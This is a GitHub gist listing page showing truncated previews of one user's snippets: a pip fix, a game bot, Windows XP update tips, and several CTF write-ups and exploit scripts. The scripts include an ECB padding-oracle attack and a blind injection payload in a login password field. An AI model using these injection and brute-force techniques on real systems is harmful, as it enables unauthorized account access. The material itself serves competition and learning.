Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / gist:456620860729c2c8aea68c30edece759
Created March 9, 2018 05:06
How to fix MacOS pip issue 'Command "python setup.py egg_info" failed with error code 1 '
$ pip2.7 install configparser
Collecting configparser
Using cached configparser-3.5.0.tar.gz
...
----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in /private/var/folders/50/7j5rhs4n4tq9hw9mjm2yntg40000gn/T/pip-build-td9Vn6/configparser/
$ pip install --upgrade setuptools
Collecting setuptools
Using cached setuptools-38.5.2-py2.py3-none-any.whl
@pich4ya
pich4ya / wolfKiller.py
Last active March 16, 2018 03:38
WebSockets Game Bot
#!/usr/bin/python3
# pip3 install websocket-client
import urllib
from urllib.request import urlopen, Request
from urllib.parse import urlencode
import string
import json
import websocket
import _thread
@pich4ya
pich4ya / gist:c8ea4b8b76616fa89f7968e2e9ac1b04
Created March 18, 2018 13:53
Update Windows XP in 2018
1. Download WSUS Offline Update Version 9.2.3
http://download.wsusoffline.net/wsusoffline923.zip
The version number is very important here. The latest version 11.1.1 does not support Windows XP.
2. Run UpdateGenerator.exe and then select the options suite to your WinXP edition.
@pich4ya
pich4ya / VolgaCTF Quals 2018 - Old Goverment Site Writeup.txt
Created March 25, 2018 15:17
VolgaCTF Quals 2018 - Old Goverment Site Writeup
Old Goverment Site
It's an old government web-site. Please, don't touch it. It works properly.
http://old-government-site.quals.2018.volgactf.ru:8080/
http://old-government-site.quals.2018.volgactf.ru:8080/page?id=2
http://old-government-site.quals.2018.volgactf.ru:8080/page?id=18
Form with 2 fields > Site, Company description.
@pich4ya
pich4ya / VolgaCTF Quals 2018 - Lazy Admin Writeup.txt
Last active March 25, 2018 17:00
VolgaCTF Quals 2018 - Lazy Admin Writeup
<!--
Lazy Admin
This lazy admin has not authorized my account yet! Get his email, I want to write to him.
https://quals.2018.volgactf.ru/tasks
http://lazy-admin.quals.2018.volgactf.ru/
http://lazy-admin.quals.2018.volgactf.ru/robots.txt
Disallow: /unauthorized_users.txt
#!/bin/sh
###############################################################################
# OpenVAS
# $Id$
#
# Script for checking completeness and readiness of OpenVAS.
#
# Authors:
# Jan-Oliver Wagner <jan-oliver.wagner@greenbone.net>
var express = require('express')
var app = express()
var bodyParser = require('body-parser')
app.use(bodyParser.urlencoded({}));
var path = require("path");
var moment = require('moment');
var MongoClient = require('mongodb').MongoClient;
var url = "mongodb://localhost:27017/";
@pich4ya
pich4ya / ecb_padding_exploit.py
Created April 2, 2018 12:39
SwampCTF 2018 - Locked Dungeon Writeup
from pwn import *
import string
s = remote('chal1.swampctf.com', 1450)
flag=''
for j in xrange(1,60):
s.send('a'*(47-len(flag))+'\n')
checker = s.recvline().strip()
@pich4ya
pich4ya / enter_the_dungeon1.py
Last active April 2, 2018 12:42
SwampCTF 2018 - Locked Dungeon
#!/usr/bin/env python
# SwampCTF 2018 - Locked Dungeon
# https://play.swampctf.com/
import argparse
from hashlib import sha256
from Crypto.Cipher import AES
import os
import sys
@pich4ya
pich4ya / loginme_exploit.py
Last active April 3, 2018 16:34
Tencent CTF LoginMe Exploit
# @author LongCat & Bongtrop
import string
import requests
import urllib
# username=admin&password=y&|hex_md5(.)(.)y.(.)....this.password_(\w%2b)|=$2%3d%3d$2$2+%26%26+this.password_$4[0]%3d%3d%3d'1+%26%26+sleex$1100$3+%26%26+$2$2%3d%3d$2
flag=''
for char_counter in xrange(0,100):
for characters in string.letters+string.digits+"{}":